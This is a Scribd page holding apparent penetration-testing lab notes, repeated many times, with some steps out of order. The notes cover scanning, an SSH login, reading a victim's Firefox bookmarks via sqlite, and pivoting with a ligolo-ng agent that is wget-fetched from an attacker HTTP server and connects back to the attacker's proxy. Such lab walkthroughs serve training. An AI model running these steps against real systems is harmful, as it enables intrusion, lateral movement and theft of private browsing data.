Thanks to visit codestin.com
Credit goes to www.scribd.com

Scribd
Upload
20 views40 pages

Dnotes

The document outlines the process for accessing and enumerating a target machine within a specified VPN scope, including scanning for available hosts and using tools like nmap and ligolo-ng for pivoting. It details the necessary commands for setting up a proxy and agent on both the attacker and victim machines to facilitate access to an internal IP range. Additionally, it provides instructions for extracting browser history and bookmarks from the target machine as part of the enumeration phase.

Uploaded by

Roy Ayub Microgenious
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
20 views40 pages

Dnotes

The document outlines the process for accessing and enumerating a target machine within a specified VPN scope, including scanning for available hosts and using tools like nmap and ligolo-ng for pivoting. It details the necessary commands for setting up a proxy and agent on both the attacker and victim machines to facilitate access to an internal IP range. Additionally, it provides instructions for extracting browser history and bookmarks from the target machine as part of the enumeration phase.

Uploaded by

Roy Ayub Microgenious
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 40

Notes:

Scope AccessVPN: 10.10.200.0/24


External IP range: 192.168.80.0/24 [192.168.80.1 is out of scope]
Internal IP range: 192.168.98.0/24 [192.168.98.1 is out of scope]
Initial AccessScanning Available Host
nmap -sn 192.168.80.0/24
PS : If you cannot discover the IPs, the server have enabled temporary pingblocking.
You can specifically scan the following IPs.We can see 1 hosts up; Let’s scan
192.168.80.10
nmap -sC -sV 192.168.80.10

ssh [[email protected]](<mailto:[email protected]>)

Enumeration
Enumerating the machine gives few leads to move forward. We saw this machine
has another adapter as well connected in different networks.

Browser history:
ls -la .mozilla/

cd .mozilla/firefox/

The filename may vary on your infrastructure, identify & use accordingly
cd b2rri1qd.default-release

sqlite3 places.sqlite
.tables
select * from moz_bookmarks;

Pivoting
Must use latest version of ligolo
We have to perform pivoting as 192.168.98.0/24 is not directly accessible from the
VPN network. We will utilize ligolo-ng for the same.
#Attacker Machine, download proxy & agent :
#Proxy
wget <https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-
ng_proxy_0.4.3_Linux_64bit.tar.gz>

tar -xvzf ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz

#Agent
wget <https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-
ng_agent_0.4.3_Linux_64bit.tar.gz>

If in target machine not downloadable directly then download it in attacker


machine, unzip it and then transfer it via http server.

tar -xvzf ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz

# In attacker
In target
wget <http://10.10.200.104:8000/agent>

Setup the ligolo-ng proxy in the attacker machine & ligolo-ng in the victim machine:
# Attacker Machine
sudo ip tuntap add user kali mode tun ligolo

#Delete the 192.168.98.0/24 IP Range from the tun0 interface :


sudo ip route del 192.168.98.0/24 dev tun0

#Up the ligolo interface :


sudo ip link set ligolo up

#Add 192.168.98.0/24 IP range to the ligolo interface :


sudo ip route add 192.168.98.0/24 dev ligolo

Start the proxy on the attacker server


./proxy -selfcert -laddr 0.0.0.0:443

#Replace this with your attacker IP address.


./agent -connect 10.10.200.104:443 -ignore-cert
chmod +x agent

In attacker side:

On the ligolo-ng proxy, check the session & start the tunnel.

Notes:
Scope AccessVPN: 10.10.200.0/24
External IP range: 192.168.80.0/24 [192.168.80.1 is out of scope]
Internal IP range: 192.168.98.0/24 [192.168.98.1 is out of scope]
Initial AccessScanning Available Host
nmap -sn 192.168.80.0/24
PS : If you cannot discover the IPs, the server have enabled temporary pingblocking.
You can specifically scan the following IPs.We can see 1 hosts up; Let’s scan
192.168.80.10
nmap -sC -sV 192.168.80.10

ssh [[email protected]](<mailto:[email protected]>)

Enumeration
Enumerating the machine gives few leads to move forward. We saw this machine
has another adapter as well connected in different networks.

Browser history:
ls -la .mozilla/
cd .mozilla/firefox/

The filename may vary on your infrastructure, identify & use accordingly
cd b2rri1qd.default-release

sqlite3 places.sqlite
.tables

select * from moz_bookmarks;

Pivoting
Must use latest version of ligolo
We have to perform pivoting as 192.168.98.0/24 is not directly accessible from the
VPN network. We will utilize ligolo-ng for the same.
#Attacker Machine, download proxy & agent :
#Proxy
wget <https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-
ng_proxy_0.4.3_Linux_64bit.tar.gz>

tar -xvzf ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz

#Agent
wget <https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-
ng_agent_0.4.3_Linux_64bit.tar.gz>

If in target machine not downloadable directly then download it in attacker


machine, unzip it and then transfer it via http server.
tar -xvzf ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz

# In attacker

In target
wget <http://10.10.200.104:8000/agent>

Setup the ligolo-ng proxy in the attacker machine & ligolo-ng in the victim machine:
# Attacker Machine
sudo ip tuntap add user kali mode tun ligolo

#Delete the 192.168.98.0/24 IP Range from the tun0 interface :


sudo ip route del 192.168.98.0/24 dev tun0

#Up the ligolo interface :


sudo ip link set ligolo up

#Add 192.168.98.0/24 IP range to the ligolo interface :


sudo ip route add 192.168.98.0/24 dev ligolo
Start the proxy on the attacker server
./proxy -selfcert -laddr 0.0.0.0:443

#Replace this with your attacker IP address.


./agent -connect 10.10.200.104:443 -ignore-cert

chmod +x agent

In attacker side:

On the ligolo-ng proxy, check the session & start the tunnel.

Notes:
Scope AccessVPN: 10.10.200.0/24
External IP range: 192.168.80.0/24 [192.168.80.1 is out of scope]
Internal IP range: 192.168.98.0/24 [192.168.98.1 is out of scope]
Initial AccessScanning Available Host
nmap -sn 192.168.80.0/24
PS : If you cannot discover the IPs, the server have enabled temporary pingblocking.
You can specifically scan the following IPs.We can see 1 hosts up; Let’s scan
192.168.80.10
nmap -sC -sV 192.168.80.10

ssh [[email protected]](<mailto:[email protected]>)

Enumeration
Enumerating the machine gives few leads to move forward. We saw this machine
has another adapter as well connected in different networks.

Browser history:
ls -la .mozilla/

cd .mozilla/firefox/

The filename may vary on your infrastructure, identify & use accordingly
cd b2rri1qd.default-release

sqlite3 places.sqlite
.tables

select * from moz_bookmarks;

Pivoting
Must use latest version of ligolo
We have to perform pivoting as 192.168.98.0/24 is not directly accessible from the
VPN network. We will utilize ligolo-ng for the same.
#Attacker Machine, download proxy & agent :
#Proxy
wget <https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-
ng_proxy_0.4.3_Linux_64bit.tar.gz>

tar -xvzf ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz


#Agent
wget <https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-
ng_agent_0.4.3_Linux_64bit.tar.gz>

If in target machine not downloadable directly then download it in attacker


machine, unzip it and then transfer it via http server.

tar -xvzf ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz

# In attacker

In target
wget <http://10.10.200.104:8000/agent>

Setup the ligolo-ng proxy in the attacker machine & ligolo-ng in the victim machine:
# Attacker Machine
sudo ip tuntap add user kali mode tun ligolo

#Delete the 192.168.98.0/24 IP Range from the tun0 interface :


sudo ip route del 192.168.98.0/24 dev tun0

#Up the ligolo interface :


sudo ip link set ligolo up
#Add 192.168.98.0/24 IP range to the ligolo interface :
sudo ip route add 192.168.98.0/24 dev ligolo

Start the proxy on the attacker server


./proxy -selfcert -laddr 0.0.0.0:443

#Replace this with your attacker IP address.


./agent -connect 10.10.200.104:443 -ignore-cert

chmod +x agent

In attacker side:

On the ligolo-ng proxy, check the session & start the tunnel.

Notes:
Scope AccessVPN: 10.10.200.0/24
External IP range: 192.168.80.0/24 [192.168.80.1 is out of scope]
Internal IP range: 192.168.98.0/24 [192.168.98.1 is out of scope]
Initial AccessScanning Available Host
nmap -sn 192.168.80.0/24
PS : If you cannot discover the IPs, the server have enabled temporary pingblocking.
You can specifically scan the following IPs.We can see 1 hosts up; Let’s scan
192.168.80.10
nmap -sC -sV 192.168.80.10

ssh [[email protected]](<mailto:[email protected]>)

Enumeration
Enumerating the machine gives few leads to move forward. We saw this machine
has another adapter as well connected in different networks.

Browser history:
ls -la .mozilla/

cd .mozilla/firefox/

The filename may vary on your infrastructure, identify & use accordingly
cd b2rri1qd.default-release

sqlite3 places.sqlite
.tables

select * from moz_bookmarks;

Pivoting
Must use latest version of ligolo
We have to perform pivoting as 192.168.98.0/24 is not directly accessible from the
VPN network. We will utilize ligolo-ng for the same.
#Attacker Machine, download proxy & agent :
#Proxy
wget <https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-
ng_proxy_0.4.3_Linux_64bit.tar.gz>

tar -xvzf ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz

#Agent
wget <https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-
ng_agent_0.4.3_Linux_64bit.tar.gz>

If in target machine not downloadable directly then download it in attacker


machine, unzip it and then transfer it via http server.

tar -xvzf ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz

# In attacker

In target
wget <http://10.10.200.104:8000/agent>

Setup the ligolo-ng proxy in the attacker machine & ligolo-ng in the victim machine:
# Attacker Machine
sudo ip tuntap add user kali mode tun ligolo

#Delete the 192.168.98.0/24 IP Range from the tun0 interface :


sudo ip route del 192.168.98.0/24 dev tun0

#Up the ligolo interface :


sudo ip link set ligolo up

#Add 192.168.98.0/24 IP range to the ligolo interface :


sudo ip route add 192.168.98.0/24 dev ligolo

Start the proxy on the attacker server


./proxy -selfcert -laddr 0.0.0.0:443

#Replace this with your attacker IP address.


./agent -connect 10.10.200.104:443 -ignore-cert

chmod +x agent

In attacker side:
On the ligolo-ng proxy, check the session & start the tunnel.

Notes:
Scope AccessVPN: 10.10.200.0/24
External IP range: 192.168.80.0/24 [192.168.80.1 is out of scope]
Internal IP range: 192.168.98.0/24 [192.168.98.1 is out of scope]
Initial AccessScanning Available Host
nmap -sn 192.168.80.0/24
PS : If you cannot discover the IPs, the server have enabled temporary pingblocking.
You can specifically scan the following IPs.We can see 1 hosts up; Let’s scan
192.168.80.10
nmap -sC -sV 192.168.80.10

ssh [[email protected]](<mailto:[email protected]>)

Enumeration
Enumerating the machine gives few leads to move forward. We saw this machine
has another adapter as well connected in different networks.

Browser history:
ls -la .mozilla/

cd .mozilla/firefox/

The filename may vary on your infrastructure, identify & use accordingly
cd b2rri1qd.default-release

sqlite3 places.sqlite
.tables

select * from moz_bookmarks;

Pivoting
Must use latest version of ligolo
We have to perform pivoting as 192.168.98.0/24 is not directly accessible from the
VPN network. We will utilize ligolo-ng for the same.
#Attacker Machine, download proxy & agent :
#Proxy
wget <https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-
ng_proxy_0.4.3_Linux_64bit.tar.gz>

tar -xvzf ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz

#Agent
wget <https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-
ng_agent_0.4.3_Linux_64bit.tar.gz>

If in target machine not downloadable directly then download it in attacker


machine, unzip it and then transfer it via http server.

tar -xvzf ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz

# In attacker
In target
wget <http://10.10.200.104:8000/agent>

Setup the ligolo-ng proxy in the attacker machine & ligolo-ng in the victim machine:
# Attacker Machine
sudo ip tuntap add user kali mode tun ligolo

#Delete the 192.168.98.0/24 IP Range from the tun0 interface :


sudo ip route del 192.168.98.0/24 dev tun0

#Up the ligolo interface :


sudo ip link set ligolo up

#Add 192.168.98.0/24 IP range to the ligolo interface :


sudo ip route add 192.168.98.0/24 dev ligolo

Start the proxy on the attacker server


./proxy -selfcert -laddr 0.0.0.0:443

#Replace this with your attacker IP address.


./agent -connect 10.10.200.104:443 -ignore-cert

chmod +x agent

In attacker side:

On the ligolo-ng proxy, check the session & start the tunnel.

Notes:
Scope AccessVPN: 10.10.200.0/24
External IP range: 192.168.80.0/24 [192.168.80.1 is out of scope]
Internal IP range: 192.168.98.0/24 [192.168.98.1 is out of scope]
Initial AccessScanning Available Host
nmap -sn 192.168.80.0/24
PS : If you cannot discover the IPs, the server have enabled temporary pingblocking.
You can specifically scan the following IPs.We can see 1 hosts up; Let’s scan
192.168.80.10
nmap -sC -sV 192.168.80.10

ssh [[email protected]](<mailto:[email protected]>)

Enumeration
Enumerating the machine gives few leads to move forward. We saw this machine
has another adapter as well connected in different networks.

Browser history:
ls -la .mozilla/
cd .mozilla/firefox/

The filename may vary on your infrastructure, identify & use accordingly
cd b2rri1qd.default-release

sqlite3 places.sqlite
.tables

select * from moz_bookmarks;

Pivoting
Must use latest version of ligolo
We have to perform pivoting as 192.168.98.0/24 is not directly accessible from the
VPN network. We will utilize ligolo-ng for the same.
#Attacker Machine, download proxy & agent :
#Proxy
wget <https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-
ng_proxy_0.4.3_Linux_64bit.tar.gz>

tar -xvzf ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz

#Agent
wget <https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-
ng_agent_0.4.3_Linux_64bit.tar.gz>
If in target machine not downloadable directly then download it in attacker
machine, unzip it and then transfer it via http server.

tar -xvzf ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz

# In attacker

In target
wget <http://10.10.200.104:8000/agent>

Setup the ligolo-ng proxy in the attacker machine & ligolo-ng in the victim machine:
# Attacker Machine
sudo ip tuntap add user kali mode tun ligolo

#Delete the 192.168.98.0/24 IP Range from the tun0 interface :


sudo ip route del 192.168.98.0/24 dev tun0

#Up the ligolo interface :


sudo ip link set ligolo up

#Add 192.168.98.0/24 IP range to the ligolo interface :


sudo ip route add 192.168.98.0/24 dev ligolo
Start the proxy on the attacker server
./proxy -selfcert -laddr 0.0.0.0:443

#Replace this with your attacker IP address.


./agent -connect 10.10.200.104:443 -ignore-cert

chmod +x agent

In attacker side:

On the ligolo-ng proxy, check the session & start the tunnel.

Notes:
Scope AccessVPN: 10.10.200.0/24
External IP range: 192.168.80.0/24 [192.168.80.1 is out of scope]
Internal IP range: 192.168.98.0/24 [192.168.98.1 is out of scope]
Initial AccessScanning Available Host
nmap -sn 192.168.80.0/24
PS : If you cannot discover the IPs, the server have enabled temporary pingblocking.
You can specifically scan the following IPs.We can see 1 hosts up; Let’s scan
192.168.80.10
nmap -sC -sV 192.168.80.10

ssh [[email protected]](<mailto:[email protected]>)
Enumeration
Enumerating the machine gives few leads to move forward. We saw this machine
has another adapter as well connected in different networks.

Browser history:
ls -la .mozilla/

cd .mozilla/firefox/

The filename may vary on your infrastructure, identify & use accordingly
cd b2rri1qd.default-release

sqlite3 places.sqlite
.tables

select * from moz_bookmarks;

Pivoting
Must use latest version of ligolo
We have to perform pivoting as 192.168.98.0/24 is not directly accessible from the
VPN network. We will utilize ligolo-ng for the same.
#Attacker Machine, download proxy & agent :
#Proxy
wget <https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-
ng_proxy_0.4.3_Linux_64bit.tar.gz>
tar -xvzf ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz

#Agent
wget <https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-
ng_agent_0.4.3_Linux_64bit.tar.gz>

If in target machine not downloadable directly then download it in attacker


machine, unzip it and then transfer it via http server.

tar -xvzf ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz

# In attacker

In target
wget <http://10.10.200.104:8000/agent>

Setup the ligolo-ng proxy in the attacker machine & ligolo-ng in the victim machine:
# Attacker Machine
sudo ip tuntap add user kali mode tun ligolo

#Delete the 192.168.98.0/24 IP Range from the tun0 interface :


sudo ip route del 192.168.98.0/24 dev tun0
#Up the ligolo interface :
sudo ip link set ligolo up

#Add 192.168.98.0/24 IP range to the ligolo interface :


sudo ip route add 192.168.98.0/24 dev ligolo

Start the proxy on the attacker server


./proxy -selfcert -laddr 0.0.0.0:443

#Replace this with your attacker IP address.


./agent -connect 10.10.200.104:443 -ignore-cert

chmod +x agent

In attacker side:

On the ligolo-ng proxy, check the session & start the tunnel.

Notes:
Scope AccessVPN: 10.10.200.0/24
External IP range: 192.168.80.0/24 [192.168.80.1 is out of scope]
Internal IP range: 192.168.98.0/24 [192.168.98.1 is out of scope]
Initial AccessScanning Available Host
nmap -sn 192.168.80.0/24
PS : If you cannot discover the IPs, the server have enabled temporary pingblocking.
You can specifically scan the following IPs.We can see 1 hosts up; Let’s scan
192.168.80.10
nmap -sC -sV 192.168.80.10

ssh [[email protected]](<mailto:[email protected]>)

Enumeration
Enumerating the machine gives few leads to move forward. We saw this machine
has another adapter as well connected in different networks.

Browser history:
ls -la .mozilla/

cd .mozilla/firefox/

The filename may vary on your infrastructure, identify & use accordingly
cd b2rri1qd.default-release

sqlite3 places.sqlite
.tables

select * from moz_bookmarks;

Pivoting
Must use latest version of ligolo
We have to perform pivoting as 192.168.98.0/24 is not directly accessible from the
VPN network. We will utilize ligolo-ng for the same.
#Attacker Machine, download proxy & agent :
#Proxy
wget <https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-
ng_proxy_0.4.3_Linux_64bit.tar.gz>

tar -xvzf ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz

#Agent
wget <https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-
ng_agent_0.4.3_Linux_64bit.tar.gz>

If in target machine not downloadable directly then download it in attacker


machine, unzip it and then transfer it via http server.

tar -xvzf ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz

# In attacker

In target
wget <http://10.10.200.104:8000/agent>

Setup the ligolo-ng proxy in the attacker machine & ligolo-ng in the victim machine:
# Attacker Machine
sudo ip tuntap add user kali mode tun ligolo

#Delete the 192.168.98.0/24 IP Range from the tun0 interface :


sudo ip route del 192.168.98.0/24 dev tun0

#Up the ligolo interface :


sudo ip link set ligolo up

#Add 192.168.98.0/24 IP range to the ligolo interface :


sudo ip route add 192.168.98.0/24 dev ligolo

Start the proxy on the attacker server


./proxy -selfcert -laddr 0.0.0.0:443

#Replace this with your attacker IP address.


./agent -connect 10.10.200.104:443 -ignore-cert

chmod +x agent

In attacker side:
On the ligolo-ng proxy, check the session & start the tunnel.

Notes:
Scope AccessVPN: 10.10.200.0/24
External IP range: 192.168.80.0/24 [192.168.80.1 is out of scope]
Internal IP range: 192.168.98.0/24 [192.168.98.1 is out of scope]
Initial AccessScanning Available Host
nmap -sn 192.168.80.0/24
PS : If you cannot discover the IPs, the server have enabled temporary pingblocking.
You can specifically scan the following IPs.We can see 1 hosts up; Let’s scan
192.168.80.10
nmap -sC -sV 192.168.80.10

ssh [[email protected]](<mailto:[email protected]>)

Enumeration
Enumerating the machine gives few leads to move forward. We saw this machine
has another adapter as well connected in different networks.

Browser history:
ls -la .mozilla/

cd .mozilla/firefox/

The filename may vary on your infrastructure, identify & use accordingly
cd b2rri1qd.default-release

sqlite3 places.sqlite
.tables

select * from moz_bookmarks;

Pivoting
Must use latest version of ligolo
We have to perform pivoting as 192.168.98.0/24 is not directly accessible from the
VPN network. We will utilize ligolo-ng for the same.
#Attacker Machine, download proxy & agent :
#Proxy
wget <https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-
ng_proxy_0.4.3_Linux_64bit.tar.gz>

tar -xvzf ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz

#Agent
wget <https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-
ng_agent_0.4.3_Linux_64bit.tar.gz>

If in target machine not downloadable directly then download it in attacker


machine, unzip it and then transfer it via http server.

tar -xvzf ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz

# In attacker
In target
wget <http://10.10.200.104:8000/agent>

Setup the ligolo-ng proxy in the attacker machine & ligolo-ng in the victim machine:
# Attacker Machine
sudo ip tuntap add user kali mode tun ligolo

#Delete the 192.168.98.0/24 IP Range from the tun0 interface :


sudo ip route del 192.168.98.0/24 dev tun0

#Up the ligolo interface :


sudo ip link set ligolo up

#Add 192.168.98.0/24 IP range to the ligolo interface :


sudo ip route add 192.168.98.0/24 dev ligolo

Start the proxy on the attacker server


./proxy -selfcert -laddr 0.0.0.0:443

#Replace this with your attacker IP address.


./agent -connect 10.10.200.104:443 -ignore-cert

chmod +x agent

In attacker side:

On the ligolo-ng proxy, check the session & start the tunnel.

Notes:
Scope AccessVPN: 10.10.200.0/24
External IP range: 192.168.80.0/24 [192.168.80.1 is out of scope]
Internal IP range: 192.168.98.0/24 [192.168.98.1 is out of scope]
Initial AccessScanning Available Host
nmap -sn 192.168.80.0/24
PS : If you cannot discover the IPs, the server have enabled temporary pingblocking.
You can specifically scan the following IPs.We can see 1 hosts up; Let’s scan
192.168.80.10
nmap -sC -sV 192.168.80.10

ssh [[email protected]](<mailto:[email protected]>)

Enumeration
Enumerating the machine gives few leads to move forward. We saw this machine
has another adapter as well connected in different networks.

Browser history:
ls -la .mozilla/
cd .mozilla/firefox/

The filename may vary on your infrastructure, identify & use accordingly
cd b2rri1qd.default-release

sqlite3 places.sqlite
.tables

select * from moz_bookmarks;

Pivoting
Must use latest version of ligolo
We have to perform pivoting as 192.168.98.0/24 is not directly accessible from the
VPN network. We will utilize ligolo-ng for the same.
#Attacker Machine, download proxy & agent :
#Proxy
wget <https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-
ng_proxy_0.4.3_Linux_64bit.tar.gz>

tar -xvzf ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz

#Agent
wget <https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-
ng_agent_0.4.3_Linux_64bit.tar.gz>
If in target machine not downloadable directly then download it in attacker
machine, unzip it and then transfer it via http server.

tar -xvzf ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz

# In attacker

In target
wget <http://10.10.200.104:8000/agent>

Setup the ligolo-ng proxy in the attacker machine & ligolo-ng in the victim machine:
# Attacker Machine
sudo ip tuntap add user kali mode tun ligolo

#Delete the 192.168.98.0/24 IP Range from the tun0 interface :


sudo ip route del 192.168.98.0/24 dev tun0

#Up the ligolo interface :


sudo ip link set ligolo up

#Add 192.168.98.0/24 IP range to the ligolo interface :


sudo ip route add 192.168.98.0/24 dev ligolo
Start the proxy on the attacker server
./proxy -selfcert -laddr 0.0.0.0:443

#Replace this with your attacker IP address.


./agent -connect 10.10.200.104:443 -ignore-cert

chmod +x agent

In attacker side:

On the ligolo-ng proxy, check the session & start the tunnel.

Notes:
Scope AccessVPN: 10.10.200.0/24
External IP range: 192.168.80.0/24 [192.168.80.1 is out of scope]
Internal IP range: 192.168.98.0/24 [192.168.98.1 is out of scope]
Initial AccessScanning Available Host
nmap -sn 192.168.80.0/24
PS : If you cannot discover the IPs, the server have enabled temporary pingblocking.
You can specifically scan the following IPs.We can see 1 hosts up; Let’s scan
192.168.80.10
nmap -sC -sV 192.168.80.10

ssh [[email protected]](<mailto:[email protected]>)
Enumeration
Enumerating the machine gives few leads to move forward. We saw this machine
has another adapter as well connected in different networks.

Browser history:
ls -la .mozilla/

cd .mozilla/firefox/

The filename may vary on your infrastructure, identify & use accordingly
cd b2rri1qd.default-release

sqlite3 places.sqlite
.tables

select * from moz_bookmarks;

Pivoting
Must use latest version of ligolo
We have to perform pivoting as 192.168.98.0/24 is not directly accessible from the
VPN network. We will utilize ligolo-ng for the same.
#Attacker Machine, download proxy & agent :
#Proxy
wget <https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-
ng_proxy_0.4.3_Linux_64bit.tar.gz>
tar -xvzf ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz

#Agent
wget <https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-
ng_agent_0.4.3_Linux_64bit.tar.gz>

If in target machine not downloadable directly then download it in attacker


machine, unzip it and then transfer it via http server.

tar -xvzf ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz

# In attacker

In target
wget <http://10.10.200.104:8000/agent>

Setup the ligolo-ng proxy in the attacker machine & ligolo-ng in the victim machine:
# Attacker Machine
sudo ip tuntap add user kali mode tun ligolo

#Delete the 192.168.98.0/24 IP Range from the tun0 interface :


sudo ip route del 192.168.98.0/24 dev tun0
#Up the ligolo interface :
sudo ip link set ligolo up

#Add 192.168.98.0/24 IP range to the ligolo interface :


sudo ip route add 192.168.98.0/24 dev ligolo

Start the proxy on the attacker server


./proxy -selfcert -laddr 0.0.0.0:443

#Replace this with your attacker IP address.


./agent -connect 10.10.200.104:443 -ignore-cert

chmod +x agent

In attacker side:

On the ligolo-ng proxy, check the session & start the tunnel.

Notes:
Scope AccessVPN: 10.10.200.0/24
External IP range: 192.168.80.0/24 [192.168.80.1 is out of scope]
Internal IP range: 192.168.98.0/24 [192.168.98.1 is out of scope]
Initial AccessScanning Available Host
nmap -sn 192.168.80.0/24
PS : If you cannot discover the IPs, the server have enabled temporary pingblocking.
You can specifically scan the following IPs.We can see 1 hosts up; Let’s scan
192.168.80.10
nmap -sC -sV 192.168.80.10

ssh [[email protected]](<mailto:[email protected]>)

Enumeration
Enumerating the machine gives few leads to move forward. We saw this machine
has another adapter as well connected in different networks.

Browser history:
ls -la .mozilla/

cd .mozilla/firefox/

The filename may vary on your infrastructure, identify & use accordingly
cd b2rri1qd.default-release

sqlite3 places.sqlite
.tables

select * from moz_bookmarks;

Pivoting
Must use latest version of ligolo
We have to perform pivoting as 192.168.98.0/24 is not directly accessible from the
VPN network. We will utilize ligolo-ng for the same.
#Attacker Machine, download proxy & agent :
#Proxy
wget <https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-
ng_proxy_0.4.3_Linux_64bit.tar.gz>

tar -xvzf ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz

#Agent
wget <https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-
ng_agent_0.4.3_Linux_64bit.tar.gz>

If in target machine not downloadable directly then download it in attacker


machine, unzip it and then transfer it via http server.

tar -xvzf ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz

# In attacker

In target
wget <http://10.10.200.104:8000/agent>

Setup the ligolo-ng proxy in the attacker machine & ligolo-ng in the victim machine:
# Attacker Machine
sudo ip tuntap add user kali mode tun ligolo

#Delete the 192.168.98.0/24 IP Range from the tun0 interface :


sudo ip route del 192.168.98.0/24 dev tun0

#Up the ligolo interface :


sudo ip link set ligolo up

#Add 192.168.98.0/24 IP range to the ligolo interface :


sudo ip route add 192.168.98.0/24 dev ligolo

Start the proxy on the attacker server


./proxy -selfcert -laddr 0.0.0.0:443

#Replace this with your attacker IP address.


./agent -connect 10.10.200.104:443 -ignore-cert

chmod +x agent

In attacker side:
On the ligolo-ng proxy, check the session & start the tunnel.

You might also like